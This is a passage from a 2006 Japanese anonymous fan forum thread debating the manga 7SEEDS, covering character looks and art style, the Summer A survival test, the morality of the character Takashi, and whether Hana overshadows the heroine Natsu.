大切な人がいない人なんていると思うのか?

416 :花と名無しさん:2006/11/16(木) 12:35:12 ID:???0
>>415
種たちがそうだと言わないけど
大切な人がいない人だってそりゃいるだろう

417 :花と名無しさん:2006/11/16(木) 12:42:16 ID:???0
その人がいなければ生きていけないほど大切な人がいるってのは
結構少ない気もするよ。

418 :花と名無しさん:2006/11/16(木) 13:56:03 ID:???0
そういう人がいたのに引き裂かれたから
秋ヲや蘭は未だに政府を憎んでいるんじゃないのかな。
あの日記で貴士の事、花が貴士の娘である事がわかったらどうするんだろ。

419 :花と名無しさん:2006/11/16(木) 14:43:04 ID:???O
蘭と秋ヲはプライドが高いからで、勝手に眠らされてこんな世界へ放り出されたのが許せないとい
う方向だと今のとこは思う。だからノートで過去に残された人々の末路を知るのは、自分らの境遇
を相対的に考え直すきっかけになるんじゃないかな?

420 :花と名無しさん:2006/11/16(木) 18:32:36 ID:Uog8uFln0
そうかこの漫画は少女漫画脳でも考えなければならないんだよな〜
SF脳はそんなに必要ないけど、冒険脳だけで考えてたよ

421 :花と名無しさん:2006/11/16(木) 21:04:22 ID:???O
何を今更。ナツや花と嵐の設定からして少女マンガ的じゃないですか。

422 :花と名無しさん:2006/11/16(木) 23:18:16 ID:???O
でも、ここまでヒロイン視点を相対化してくる少女漫画は珍しく思えるな

423 :花と名無しさん:2006/11/16(木) 23:51:10 ID:???O
そうでもない

424 :花と名無しさん:2006/11/17(金) 03:47:24 ID:???O
>>422じゃないけど7SEEDSみたいな形式の少女マンガが珍しいことを考えたら、そう言えるのでは
ないだろうか。別視点の主人公がいる間はヒロインがほとんど出ないから、否応無しに相対化され
るよね。でも一旦主役に戻ると徹底的に主人公らしく内面もきっちり描かれる。
おかげで妙なひっかかりも感じやすくなるけど、しょうがないのかな。( ´Д`)

425 :花と名無しさん:2006/11/17(金) 03:48:10 ID:???O
ミラクルガールズとか。
性格正反対の双子。
そして見た目も性格に反してる。
ナツと花がともみとみかげに見えてきたー

426 :425:2006/11/17(金) 03:57:19 ID:???O
論点のずれた発言してしまった
スマンorz

427 :花と名無しさん:2006/11/17(金) 16:45:51 ID:???O
嵐と安居はどっちがイケメンだろう…なんかかぶる
一番のイケメンは新巻なのかな…
みんなイケメンでよくわからんw
女は美鶴→あゆ→花だと思うw

428 :花と名無しさん:2006/11/17(金) 18:52:56 ID:???O
>>427
二人とも男前だと思うけど、嵐の方が(彼女がいるせいか)少し大人っぽく見えるような。
女の子の場合、その三人ならあゆが一番綺麗な気がする。
この辺は完全に好みの問題だろうけど。
個人的には、男性キャラは、
ハル=涼>鷹=嵐=安居>蝉

女性キャラは、
あゆ>美鶴>花

かな。
美形だと思う順としては。

429 :花と名無しさん:2006/11/17(金) 19:54:49 ID:???0
美人と言うことではあゆと美鶴さんがツートップかな。
あゆはパーツの良さとバランスでは1番の正統派美人だと思う。美鶴さんは美形の上に、
醸し出す凛とした雰囲気がいい。
花も綺麗なんだけど、美人と言うより可愛い系かな。沢尻エリカみたいな感じ?この3人で
デフォルメ顔が似合うのも花だけだし。
この3人がトップ3ってのに異論はないな。

430 :花と名無しさん:2006/11/17(金) 20:19:19 ID:???0
友達にコミックス見せたらナツを小学生だと思ったらしく
高校生!?って驚いてた

431 :花と名無しさん:2006/11/17(金) 23:53:20 ID:???O
流星くんもかなり美形じゃない?

432 :花と名無しさん:2006/11/18(土) 00:06:42 ID:???O
>>428
確かに嵐はセクシーだねw

>>429
次読むときから花を沢尻エリカに脳内変換してしまうよww

433 :花と名無しさん:2006/11/18(土) 00:16:39 ID:???0
男女皆普通より容姿はいいんだろうけど容姿のタイプが違う気がする。
恋愛シュミレーションゲームで言うところの各種取り揃えました、みたいな。

434 :花と名無しさん:2006/11/18(土) 02:38:37 ID:???0
あんだけの人数を描き分けるのは人間業じゃない。
BASARAだって多かったが、あちらは老若男女のバリエーションが
豊富だった。
この作品で、メンバー30人近くが一斉に集合するシーンなんて
最後までやらないような気がする。

435 :花と名無しさん:2006/11/18(土) 07:13:57 ID:???O
安居が反白髪になったのは、
嵐との描き分けるためってのもあるんだろうね。

436 :花と名無しさん:2006/11/18(土) 08:32:16 ID:???O
>>435
あ!あと安居は涙ボクロがあるねw
最初気付かなかったよ…

437 :花と名無しさん:2006/11/18(土) 09:18:06 ID:???0
嵐と安居は、嵐の髪も伸びたし見分けやすくなったけど、
今度は嵐と流星が・・・

438 :花と名無しさん:2006/11/18(土) 11:25:13 ID:???O
嵐と流星すら見分けがつきにくいなら読むの大変だな。
鷹の髪切らないのも百舌とかぶるからだったりして…くっそうw

439 :花と名無しさん:2006/11/18(土) 12:09:37 ID:???0
嵐と流星ってそんな似てたっけ??

440 :花と名無しさん:2006/11/18(土) 12:47:02 ID:???O
全然。花が聞いたら怒るなw

441 :花と名無しさん:2006/11/18(土) 16:59:47 ID:???O
ナツはノブタの堀北をイメージして読んでる

442 :花と名無しさん:2006/11/18(土) 17:07:20 ID:nRXtxy8O0
ナツって誰だっけ?

443 :花と名無しさん:2006/11/18(土) 17:22:17 ID:eUkt5TGqO
>>442は知らなくていい。

444 :花と名無しさん:2006/11/18(土) 20:12:29 ID:???0
>>442
主役の女性。かっちょいい姐さん。

445 :花と名無しさん:2006/11/18(土) 22:49:39 ID:???0
そう、かっちょいい姐さんだと花が言っていた。

446 :花と名無しさん:2006/11/18(土) 23:09:31 ID:???O
言ってたのは藤子だよ。

447 :花と名無しさん:2006/11/19(日) 02:27:57 ID:???0
とにかくナツはかっちょいい姐さんなのだ

448 :花と名無しさん:2006/11/19(日) 04:51:59 ID:???0
つるちゃん、雄生、伊織、朱理、嵐、安居と、男主人公はたいてい黒髪だな。
たむさん黒髪がタイプなんかな。
そうじゃないのはビショップの輪のレイジと…BOX系とシカゴは忘れでもうた。

449 :花と名無しさん:2006/11/19(日) 11:52:29 ID:???O
もともとヒロインが白だとヒーローは黒、てマンガは多いよね。
私はストレートの黒髪は前髪ぱっつんな女性キャラが多いのが気になる…。
ナツものびすぎたら元に戻しそうで。

450 :花と名無しさん:2006/11/19(日) 13:11:53 ID:???0
>>448
志村ー!龍ちゃん 龍ちゃん
しかし、今までのタムさんの男主人公ってクセのあるタイプが多いけど、
7種は嵐にしろ、鷹も安居も素直な子ばっかりだなあ

451 :花と名無しさん:2006/11/19(日) 14:44:47 ID:???0
>>448
雄生が誰だか思い出せない・・・
誰だっけ?テニスのやつ?

452 :花と名無しさん:2006/11/19(日) 19:42:17 ID:???0
>>451
Yes。「ちょっと英雄してみたい」ですね
余談だが、「巴がゆく」で月子とお見合いをしたらしい。


453 :花と名無しさん:2006/11/20(月) 00:04:58 ID:???0
えっマジですか!?>>452
しえぇ〜知らんかった。ちょっと読み返してこよう。
ありがd

454 :花と名無しさん:2006/11/20(月) 00:08:45 ID:???O
嵐はおどおどしてた初期のナツや、潔癖な花に好かるキャラでなくてはならないし、鷹は私欲なし
に人に尽くす性分を強調しなくてはならないし、安居は主人公格で共感されるキャラでなくてはな
らないしで、癖のある性格だと話の焦点がぼやけてしまうからかもしれない。

455 :花と名無しさん:2006/11/20(月) 09:50:17 ID:???0
タムさん好みの癖のある白髪(茶)は出てるけど、癖のある黒髪はいないよね。
とはいっても主要キャラはほとんど出ちゃったし、今回は我の強い黒は出さないのかな??

456 :花と名無しさん:2006/11/20(月) 13:27:57 ID:???O
あまりアクが強くても個性的でもこの世界じゃ浮きそうだ。趣味だなあ、と思うのは角又かな。
吹雪も生きてれば誰ともかぶらなかったのに。

457 :花と名無しさん:2006/11/20(月) 14:17:09 ID:???0
吹雪みたいなキャラがいたら物語も結構明るい方向にいきそうだ。

458 :花と名無しさん:2006/11/20(月) 15:27:46 ID:???0
>癖のある黒髪

ばん(変換できなかった)がいるじゃないか
多聞さん好きだったからそれ系統の人がいてちょっと嬉しい

459 :花と名無しさん:2006/11/20(月) 16:04:47 ID:???O
>>457
吹雪は今思えば死なすには惜しすぎる強気漢キャラでした。
>>458
それは黒のくせっ毛キャラ…。

460 :花と名無しさん:2006/11/20(月) 22:04:24 ID:???0
トーン髪ってちさちゃんだけだっけ?


461 :花と名無しさん:2006/11/20(月) 23:13:49 ID:???O
顔は似てても花は朱里のような人は「あんたは嵐じゃない」と切り捨てそうだよね。

462 :花と名無しさん:2006/11/20(月) 23:34:33 ID:???0
嵐も安居も最初癖っ毛に見えたのは自分だけ?
てかくりくり同盟に一人黒髪が居るじゃないか。あからさまに悪役だったけど<癖のある黒髪

463 :花と名無しさん:2006/11/20(月) 23:57:12 ID:???O
と言うかそもそも>>455 は髪の癖じゃなくて性格のことでしょ?
その上で話に乗るなら流星と冬の睦月、貴士、ついでに女だけど蘭、ひばり、蛍と黒のくせっ毛キ
ャラは多いよ…。嵐と安居はさらさら剛毛っぽいけどな。

464 :花と名無しさん:2006/11/21(火) 05:45:01 ID:???0
今さらながら7種の9巻読みました。
うーむ、予想通りの7人が残りましたね。
あえて読者の予想を裏切って、涼とか虹子とかが脱落して、
茂や鵜飼が残ったりするのかとも思ったけど、普通にタレント性のある
キャラが残ったので、なんか予定調和っぽかったけど、これも貴士たちの
計画通りってことなんでしょうね。

465 :花と名無しさん:2006/11/21(火) 11:27:28 ID:???0
うーん、涼も虹子もちゃんと準備してきた子だからなあ。
それでも残れないなら、本当に救いも何もないテストだ。

466 :花と名無しさん:2006/11/21(火) 12:11:28 ID:???O
ほとんど最終テスト前までに単独エピがあり安居と会話してきたキャラばかり残ったから予定調和
に見えても仕方ないけど、逆に考えるとその他大勢より突出して才能があるからこそリーダー志望
の安居と関わりを持つことができたのかな。類は友を呼ぶ。

467 :花と名無しさん:2006/11/21(火) 13:17:55 ID:???0
そうか。なんか夏Aに感情移入できなかったのは予定調和だったせいか。
能力や今までの行動でこの7人を予定してたのなら、他のメンバーは許してやって欲しかった。

468 :花と名無しさん:2006/11/21(火) 13:58:45 ID:???O
最初からキャラを決めて話を作ってたらそりゃそうなるだろう。でもくりくり同盟をもっと早く出
して繭も最初からかわいくて、あゆのいじめっ子をメインキャラ顔にしたらもっと予測が困難にな
ったかもね。途中からエピができたんだろうから無理だろうけど。

469 :花と名無しさん:2006/11/21(火) 15:06:22 ID:???O
>>467 ある程度は絞りこまれてたと思うけど、
あの構成になったのはやっぱ最終テストの結果だろう。
先生たちに数に数えられてなかったようなのには、
あれテストじゃなくて始末だったと…

470 :花と名無しさん:2006/11/21(火) 16:42:11 ID:???0
速く終わってほしい

471 :花と名無しさん:2006/11/21(火) 22:05:32 ID:???O
ナツが主役に返り咲くまでは終わらないでほしい。

472 :花と名無しさん:2006/11/21(火) 23:10:24 ID:???0
>>467
予定調和っていうのもあるけど結局与えられた環境の中だけで動いてただけ
ってのがなにがなんでも生きる力と姿を描く上で弱く見える(≒実際に弱い?)

473 :花と名無しさん:2006/11/21(火) 23:52:42 ID:???0
卵浪が徹底的に(典型的な)嫌なやつに描かれてたのが微妙だった
やってる事は貴士や要の方が数倍酷いのに、奴だけ7人に恨み集中されててなー
まあいるけどさああいう教師…
誰も俺達を裁けない救えない…のモノローグは、おいおい酔ってんなーと思った

474 :花と名無しさん:2006/11/22(水) 00:04:28 ID:???O
>>472
素朴な疑問。その与えられたのがワニやピラニア、毒グモ毒蛇毒ガエル、熊、虎が徘徊し毒草木が
あるわ山崩れ、落雷、洪水が起こるわのすさまじい人為的環境だったわけだがそれ以上のってどう
描けばいいの。例えばもっとメインキャラ間で見捨てたり殺し合いしてほしかったとか?
私的には一線を超えなくて良かったなと思ってるが。

475 :花と名無しさん:2006/11/22(水) 00:20:32 ID:???0
最近7種がどう終わるのか考えるんだけど、
どう終わるんだろうね?

どのチームが生き残るか。って言うのも絶対違うし、(でもどんどん死んでいきそう・・・)
かといって最後に全滅、作戦は大失敗 だったら後味悪すぎるし
何か国かなにかを作って無事HAPPY END・・・っていうのかな?

ってもう終わりのこと心配しても仕方ないけど

476 :花と名無しさん:2006/11/22(水) 00:33:00 ID:???O
>>473
卵浪…珍しい誤字だ。
それはともかく、要や貴士に卯浪よりましな最期が用意されてるとは限らないかも。
とはいえ貴士は描かれてないところで実は安居に殺されていた、とはならなかったのが少々残念。
涼のモノローグは彼すら心に癒せない傷を負ってしまったんだなとよくわかった。

477 :花と名無しさん:2006/11/22(水) 01:11:48 ID:???0
>>474
単純に逃げる・脱出するという方策を選んだ人間がいなかったのが不満かな。
もちろん箱舟に乗るためには組織内にいなければならないって前提がある以上
無理な話なのかもしれないが夏Aの連中はそもそもそういう発想すらなかったっていう
描かれ方だから。
個人的には環境適応能力を試すというのなら実社会から隔離されてきた彼らを
いきなり都会に放り込んで鬼ごっこをさせるというのもアリだったと思う。
すさまじい環境というけど軍隊レベルのサバイバル技能持った人間なら
ナイフ一本あればピクニック同然の内容だし。

478 :花と名無しさん:2006/11/22(水) 02:46:18 ID:???O
環境適応力を試すんではなく未来のサバイバル環境でやってけるかを試すテストじゃなかったっけ。
簡単に言うけど実際死人続出だよ。まあメインキャラに見せかけた別キャラに逃げようとさせるエ
ピがあっても良かったとは思うけどね。大体そこまでやると後何話いることになるかと思うと…。
あくまで夏A編は7SEEDSのいくつもの章の一つにすぎないからなあ。

479 :花と名無しさん:2006/11/22(水) 03:24:10 ID:???0
>すさまじい環境というけど軍隊レベルのサバイバル技能持った人間なら
>ナイフ一本あればピクニック同然の内容だし。

どこの軍隊だよwwww

480 :花と名無しさん:2006/11/22(水) 04:40:24 ID:???0
夏Aはある意味、完璧に近いメンバーが残ってしまったから確かに感情移入しにくいし、
人格が壊れたとはいえ、サバイバル的にはあまり不安がないんだよな。
茂や鵜飼やちゃっかり四銃士みたいなのが一人いると、堤防の穴のような
不安要素になって面白かったかも。

481 :花と名無しさん:2006/11/22(水) 08:14:59 ID:???O
>>477 船までたどり着いたのは涼たちがはじめてじゃない。
とすると、脱出しようとした子は描かれてないけど、いたんでしょう。

482 :花と名無しさん:2006/11/22(水) 11:14:26 ID:???O
夏Aの中でも女+鷭は戦闘能力方面で評価が甘めだから、けっこう能力差がある。
夏Aの存在自体が他チームにとって不安要素になるんだろうからそれくらいでむしろ安心だけど。
他チームが付け入る隙もなくはないから。

483 :花と名無しさん:2006/11/22(水) 13:19:39 ID:???0
貴士先生は最後に自殺するのかな。
最後に夏Aやその他計画の犠牲になった人たちに謝し、種たちの未来を祈りながら、自身を罰するようにわざと長く
苦しむような自決の仕方をすれば、少しは見直すかも。特攻隊の大西中将みたいに。
最期の時に美帆さんや花の回想だけだったらやだな。種たちみんなの姿を思い浮かべながら、最後に花が出てくる
ぐらいならいいけど。父親だから。

484 :花と名無しさん:2006/11/22(水) 13:44:00 ID:???O
残念ながら貴士のような人こそちゃっかり四銃士です。

485 :花と名無しさん:2006/11/22(水) 15:32:46 ID:???0
貴士先生好きだけどな

軽く「涼に襲いかかったら刺された」なんて言っちゃうところとか


まあ、もちろん、やったことは許せないけど

486 :花と名無しさん:2006/11/22(水) 16:43:34 ID:???O
貴士は花の父かもという予測はあったし、卯浪よりはもう少しまっとうなキャラだと思ってたから、
最終テストの最後でなんか裏切られた感じ、みたいな。
涼が選ばれるから茂か安居しか選ばれない、てのも結局安居にしか言ってなかったわけで、人の気
持ちをあの笑顔で弄んだのがひっどい奴ーと思う。あの時は完璧に開き直ってたよな。
奴のおかげでとても花が正統派ヒロインには見えぬw

487 :花と名無しさん:2006/11/22(水) 17:02:06 ID:???0
白虎の村に朱理が混じってるようなもんかな。
しかも、何にも知らずに。

488 :花と名無しさん:2006/11/22(水) 17:47:09 ID:???0
貴士本人じゃなくて、その子供なんだから
求道が四道の子と知らずに混ざってるようなもんじゃないのか?

489 :花と名無しさん:2006/11/22(水) 19:04:06 ID:???0
むしろ浅葱?

490 :花と名無しさん:2006/11/22(水) 19:42:55 ID:???0
っていうかナギ?

浅葱って結局誰の子なの?
ねーさん(白の人)でおk?

491 :花と名無しさん:2006/11/22(水) 20:53:20 ID:???0
どっかから拾ってきた孤児だったんじゃ?

492 :花と名無しさん:2006/11/22(水) 20:57:21 ID:???0
>>486
そういう所で成長したナツとのバランスをとろうとしているのでは?
対極ヒロインとして並べた立たせるには花が華やか過ぎるし。

493 :花と名無しさん:2006/11/22(水) 21:13:10 ID:???O
>>492
バランスは花の微妙な脆さ(とナツがこの先もっと強くなるならだけど)で十分取れてると思うけ
どなあ。せめて貴士に激しい葛藤が見えたなら。本人にあまりにも責任ないことで無理矢理話の中
心に置かれてるのがやな感じだな。

494 :花と名無しさん:2006/11/22(水) 21:17:23 ID:???0
いや、逆に生い立ちに傷を持つという、華やかな中に陰のある設定まで付いてしまって
ますますナツが背景に…

495 :花と名無しさん:2006/11/22(水) 21:43:13 ID:???O
背景以前にずーっっと登場すらさせてもらえない状況なんだってことを忘れないでください。・゚・(ノД`)・゚・

496 :花と名無しさん:2006/11/22(水) 22:47:23 ID:???0
もう黒化でもしないと舞台の中央に戻って来れそうもないなぁ>ナツ

497 :花と名無しさん:2006/11/22(水) 22:54:57 ID:???O
置き去りにされる鷹を見てるだけだったことに引っ掛かりを感じないようじゃナツのサブキャラ化
は避けられないと思われ。嵐に進言したり蝉と対立したりするとなお良いが。

498 :花と名無しさん:2006/11/23(木) 03:51:31 ID:???0
そういうキャラこそ、サブよりメインにもってくるのが
得意な作家もいるんだけどね。
たむさんは短編ではいくつか前例があるんだが、長編では無い。


499 :花と名無しさん:2006/11/23(木) 08:25:18 ID:???O
行き当たりばったりではなく大体いくつかのシーンを決めて話を作ってるらしいから、それなら最
初から話を引っ張る力のない弱々しい女の子を主役に据えたりしないと思うんだけどな。
今のままじゃいい役割を全て花に持ってかれてて、他の章のキャラと比べてもやっぱりバランスが
悪すぎだし、これから困難にどう立ち向かうかなんじゃない。

500 :花と名無しさん:2006/11/23(木) 11:36:18 ID:???O
>>496
「舐めて。」
「ちゃんとよ。嵐。もっとちゃんと」
「あぁっ、抱きなさいわたくしを!抱きなさい、嵐っ!!」


「ナツさま・・花と離れて以来、私は男として機能しません」

「ほ・・・ほほ・・・・・・・ハッハッハッハッハッハッ!
行って!消えなさい、役立たず!!」


501 :花と名無しさん:2006/11/23(木) 12:16:09 ID:???O
花側と違って今一つ嵐も蝉も頼りないから、ナツが頑張らなければならない必要性は高そうなのだが。

502 :花と名無しさん:2006/11/23(木) 14:18:04 ID:???0
>>500
それは白化

503 :花と名無しさん:2006/11/23(木) 15:25:11 ID:7j1bhC/Z0
単行本しか読んでない。連載の方どうなってるの?
今どのチームの話?

504 :花と名無しさん:2006/11/23(木) 15:25:41 ID:???0
ごめん上げてしまった。

505 :花と名無しさん:2006/11/23(木) 17:53:05 ID:???O
>>492
お父さんが汚れ役なのはナツとのバランスというよりは花の設定内でバランス取ろうとしてるんじ
ゃないかなー。専門教育も受けられ恋人も選ばれ重要キャラには誰でも特別な人と思われ。
特に恋人のことは都合良すぎるんじゃと前から言われてたし。夏Aにシンクロした人には逆効果じ
ゃないかと思われるが。

506 :花と名無しさん:2006/11/23(木) 22:43:58 ID:???0
>>503
花と分裂した秋が混じってシェルターめぐりしているところ

507 :花と名無しさん:2006/11/23(木) 23:37:38 ID:???O
しばらく夏Bも夏Aも出ないし、シェルター組全滅までの欝話が続きそうだしで、みんな疲れてる?

508 :花と名無しさん:2006/11/24(金) 01:25:41 ID:???0
別に。十分楽しんでるよ。いつかはXデーの日も描かれると思ってたし。
特に組に対する思いいれはないし、物語そのものを楽しんでるから。
夏Aあたりも気にはなるけど、出てくるのはこの話の決着がついてからでいいよ。

509 :花と名無しさん:2006/11/24(金) 03:58:41 ID:???0
なんかみんな貴士=悪いやつって単純に見過ぎだと思うわ。
たしかに夏Aに対してひどいことを言ったりやったりしたけど
あれだって貴士にとっては一本筋の通ったことだったわけだし。
それが正しいとか美しいとは本人も思っていないだろう。
貴士が悪人=その娘の花も憎い=花のマイナス点、ってのも単純すぎる気がする。

BASARAなんかもそうだったけど、
殺しあった者同士でも立場が違っただけで、どっちが完全悪ってことはないし
親が殺しあってもその子供どうしは大親友になったりするわけじゃない。
タムさんはそういう一面的な善悪とか好き嫌いは無意味だって
描く人だと思うよ。

510 :花と名無しさん:2006/11/24(金) 04:16:26 ID:???0
つーても何の罪も無い4993人をぶち殺したのはアレすぎだろ
でもこの作者ってそういうキャラ好きだよね…「踊る教室」のテロリストの人とか

511 :花と名無しさん:2006/11/24(金) 06:08:01 ID:???0
>BASARAなんかもそうだったけど、 殺しあった者同士でも立場が違っただけで、
>どっちが完全悪ってことはないし

朱理と貴士は違う。日本国王とも違う。貴士は自分の掌で何も事情を知らない人間を
一方的に殺しただけ。
問題はなにを悪とするかだが、娘と妻のために罪のない人間を大量虐殺し、エゴで
自分の娘だけ未来に送った行為を悪としないなら、何を悪と呼ぶのかわからない。
歴史上の大量虐殺者も自分の脳内では一本筋の通った信念があっただろうし、
脳内で筋が通ってる分、いくらでも自分を正当化できるから恐ろしい。
また、たとえ自分で美しいとか正しいとか思ってなくても、行動に移した時点で
なんの免罪符にもならない。

でも娘は関係ないっていうのは同意。
もちろんそれは読者の視点で、登場人物たちにしてみれば
簡単には割り切れないだろうけど。

512 :花と名無しさん:2006/11/24(金) 06:20:36 ID:Y6Bv+yIq0
>>509
『吐き気をもよおす邪悪とはッ なにも知らぬ無知なるものを利用する事だ………!
 自分の利益のためだけに利用する事だ…。
 政府の人間が何も知らぬ子供達と民衆を!!てめーと家族の都合だけでッ!』

513 :花と名無しさん:2006/11/24(金) 08:02:57 ID:???0
>>512
こうやって見るとえらくかっこいいな

514 :花と名無しさん:2006/11/24(金) 09:01:22 ID:???O
>>509視点では貴士も卯浪も悪い人ではないんだろうけど、それはそれでいいと思う。
ただ何を単純な見方とするのかも人それぞれだけど。

515 :花と名無しさん:2006/11/24(金) 09:35:33 ID:???O
あ、私卯浪は平気だな
比較問題かもだけど
奴は自分の幸福の追及はしてないからさ―

516 :花と名無しさん:2006/11/24(金) 09:58:04 ID:???0
私も卯浪は全然許容範囲だな、実際近くにいたら生理的に嫌かもしれんが
子供達にあんなに憎まれちゃって可哀想…とか思ってた
個人的に皆に殺される役は貴士の方がよかったな
要は……頭のネジがぶっ飛びすぎててコメントのしようがない

517 :花と名無しさん:2006/11/24(金) 11:40:13 ID:???0
まーでも卯浪はぶち殺されずに生きてたら、確実に女に手を出してたと予想(7巻P98とか)

518 :花と名無しさん:2006/11/24(金) 12:14:19 ID:???0
そうなったら返り討ちにあうか(小瑠璃は体力的に微妙だな)、涼あたりにブッ殺されるだろうね

519 :花と名無しさん:2006/11/24(金) 12:24:48 ID:???0
>>511
>娘と妻のために罪のない人間を大量虐殺し、

これだと花にも責任あるだろ。

520 :花と名無しさん:2006/11/24(金) 12:52:38 ID:???0
いや、生まれてくる子供に責任はないだろ

妻と子供のために…!とか一人で盛り上がっちゃって
貴士一人の判断でやったことなんだから、
その責任を子供にまで押し付けるのはどうかと思う。

521 :花と名無しさん:2006/11/24(金) 13:17:33 ID:???O
確かに夏A編で花が嫌いになった、てのは感情的すぎだけど。関係ないって言っても花は確実に恩
恵も受けてるから割り切りにくい。それより前に嵐ともどもイライラさせられたし。
大体あの父と花のキャラが乖離しすぎてるのももやもやの元。一見完璧ヒロインの父があんなんで
いいのかってね。少しでも葛藤があるなら穀雨内で見せてくれよと。

522 :花と名無しさん:2006/11/24(金) 13:19:29 ID:???0
>>521
どーでもいいけどあなたの改行特徴ありすぎだろw

523 :花と名無しさん:2006/11/24(金) 13:25:03 ID:???O
時間がないんだスマン。

524 :花と名無しさん:2006/11/24(金) 14:05:20 ID:???0
私は花が貴士の娘であるという事に関しては別にどうでもいい。
ただ、花が父親のやってきた事を知った時、
それに対してどういう考え方をするかに興味がある。
彼女が父のした事を全面的に肯定することは無いだろうけど、
「お父さんは本当はあたしの事を愛していて嵐も一緒に
 未来に送ってくれたのね。ウルウル」になったら萎えそう。


525 :花と名無しさん:2006/11/24(金) 15:53:58 ID:???0
夏Aとか貴士先生とか関係なく
ただナッちゃんを主役の座から蹴落としたのが気に入らないわけでw

526 :花と名無しさん:2006/11/24(金) 16:48:21 ID:???0
昨日、1〜9巻まとめ買いして一気読みしました。
一番ボリュームもドラマ性もあるからか夏Aの章が一番面白かったかな。
あと短くとも鮮烈な印象残った冬の章。
夏Bと春が物語全体としてはメインなのかもしれないけど
うーん、イマイチ…花と嵐のカップルに感情移入しづらいからかな?

ところで嵐が実は安居のクローンだったって説はどうかな?
夏Aの7人が決定したあと、やっぱり失敗だったって要の思いから
もう1度安居を受精卵からやりなおし→普通の子として育てたのが嵐、という。
で、本物の嵐はあぼん、夏A登場でもう一人の嵐である安居(超やさぐれ)を
愛して癒せるかというのが花の役割だったりしたら好感度うpかも。
雑誌読んでないんで見当はずれorさんざんガイシュツネタだったらごめん。

527 :花と名無しさん:2006/11/24(金) 16:48:35 ID:???0
まだ蹴落とされてないよ
1年以上出てないだけで・゚・⊃Д`)・゚・

528 :花と名無しさん:2006/11/24(金) 16:53:31 ID:???0
別に花嫌いじゃないけど
やたらと男キャラに好かれるのが嫌だ。
なっちゃんに感情移入してる私としては劣等感感じまくりだよorz

529 :花と名無しさん:2006/11/24(金) 16:54:41 ID:???0
一卵性双生児でもそれぞれ別の人格・人生を持っているんだから、
クローンで遺伝情報が同じというだけで花が安居とくっついたら、自分的には萎えだな…

530 :花と名無しさん:2006/11/24(金) 17:02:51 ID:???0
なっちゃんって花どころか嵐にも喰われてるよね。

531 :花と名無しさん:2006/11/24(金) 17:24:19 ID:???O
いっそ花の方だけ選ばれてて恋人は本当に天変地異で死んでました、それで鷹とくっつく、ナツは
嵐と、ならナツだけでなく他の主役と釣り合いが取れてたかも。それか鷹がナツに行ってくれるか。
花だとなんか当たり前すぎてなー。花みたいな可愛くて強くてでも脆いとこもあり、でモテる女の
子って単独主役ならいいけど後で出てこられるとけっこう嫌なもんだww

532 :花と名無しさん:2006/11/24(金) 17:31:54 ID:???0
>>525-531は結局、ナツから主役を取った花ウゼー、ってことでいいのかな?

533 :花と名無しさん:2006/11/24(金) 17:33:48 ID:???O
嵐がいまいち魅力的に見えないのも花やナツの思いに感情移入できない原因かもね。
真面目な優等生男キャラなら確かに同タイプの安居のほうが能力の優秀さもまさってるし、
ずるさや弱さ含めたダーク面も掘り下げて描いてある分魅力的。
花のどうしても嵐でなきゃ!って気持ちに読者として同調できれば
ハラハラドキドキ楽しめるんだろうけど。

534 :花と名無しさん:2006/11/24(金) 20:05:33 ID:???0
>>532
ナツに感情移入してるから、
嵐に愛されてる花を好きになれないだけなんじゃね?

535 :花と名無しさん:2006/11/24(金) 20:47:07 ID:???O
花以上にナツらを踏み台に鷹を使ってまでの花マンセーがうざいのよ。
花と出会った後なんか、15年なんて思い切り良すぎる割に彼の心情表現がおざなり。
男性向け漫画ならもっとそこに力を入れただろうに、もったいない。

536 :花と名無しさん:2006/11/24(金) 20:50:24 ID:???0
早く読みたいよ 終われって意味じゃなく最終回知りたい

537 :花と名無しさん:2006/11/24(金) 21:04:32 ID:???0
確かに通して読むと花マンセーが過ぎてバランスが崩れているような。
それまで丁寧にされていた他の登場人物の心理描写も花と関わると
彼女中心になってしまう感じがする。
夏Aと花が出会った時、花中心描写になったら萎えそう。

538 :花と名無しさん:2006/11/24(金) 21:12:28 ID:???0
>>537
それはそうなるんじゃないの。ナツと花が主役です、と作者が明言してるんだから。
出番が少ないから目立たないけど、ナツが出てるときはナツ視点だし。
主役視点じゃないほうがおかしいような気も。ナツと花だとどうなるかは楽しみだけど。

539 :花と名無しさん:2006/11/24(金) 22:18:12 ID:???0
ナツが出ている時は彼女そっちのけで嵐視点にもなる時あるし
嵐視点だとモノローグは花、花、花。
結果、ナツの話も花に侵食されているようになっている。

540 :花と名無しさん:2006/11/24(金) 22:26:46 ID:???0
どこのみんなかわからないけど、
貴士悪い人→花憎いとは思ってないなー。
花は悪くないのに、恩恵受けて花マンセーなとこが
どうもなーと思うけど。
これでナツが花に出会った途端に
花マンセーになったらどうしようとは思うよー。




541 :花と名無しさん:2006/11/24(金) 23:35:25 ID:???0
貴士はキャラ的にはBASARAでいえば四道だよね。
奥さんと子供にはいい父親だったし
朱理の親友だったし。
でも敵や一般市民には容赦せずに、顔色かえずに皆殺しする
策略でハヤトの母親殺したよね?たしか。
ハヤトや更紗は一生、四道を許さないだろうけど
朱理やアゲハはずっと四道を好きなんだよなあ。

542 :花と名無しさん:2006/11/25(土) 00:48:12 ID:???0
母親は殺されてないよ

543 :花と名無しさん:2006/11/25(土) 01:32:16 ID:???0
>>541
おいおい四道と貴士を一緒にしたら、朱理も揚羽もきっと激怒するぞ。
四道は主君のために自ら戦場に赴いて戦った軍人。しかも討伐した相手は
れっきとした反・赤の王を掲げた連中だ。
だが、貴士は自分を信じてる子供たちを殺し合わせ、なにも知らぬ無知なるものを
自分の利益のためだけに利用する吐き気のする邪悪wだぞ。

ただの職業軍人と利己的大量殺人者を一緒にしたらあかん。

544 :花と名無しさん:2006/11/25(土) 02:55:55 ID:???0
>>526嵐が実は安居のクローンだった
おいおいそんな事したら花の好感度がどうとかいうどころじゃないぞw
そこまでやったら本当に要は最低だろう、夏Aの成れの果てを見て何も感じなかったつう事になる
ただ年代的にありえないと言い切れないのが怖い

545 :花と名無しさん:2006/11/25(土) 05:43:58 ID:???O
>>544
何も知らない平凡で幸せなもう一人の安居を作ってやるのが安居への償いになる、
という狂った発想かもしれないよ。要、頭おかしいし。

546 :花と名無しさん:2006/11/25(土) 06:04:48 ID:???0
描き分け出来てないからってクローン説が出るとはかわいそす


547 :花と名無しさん:2006/11/25(土) 08:10:13 ID:???0
>だが、貴士は自分を信じてる子供たちを殺し合わせ、なにも知らぬ無知なるものを
自分の利益のためだけに利用する吐き気のする邪悪wだぞ。

こんな風に読めるのか…
貴士って別にあのプロジェクト自分が金出してやってるわけじゃないし、
